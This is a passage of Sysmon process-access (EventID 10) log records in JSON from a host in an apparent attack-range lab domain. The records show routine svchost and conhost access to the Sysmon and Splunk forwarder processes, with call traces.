05:54:50.176","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5881,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5882,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5883,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5884,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5885,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5886,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5887,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:54:51","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:54:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5888,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:54:50.176\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-03AA-5F25-0000-001057F40A00}\r\nTargetProcessId: 4624\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:54:50.176","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-03AA-5F25-0000-001057F40A00}","TargetProcessId":"4624","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 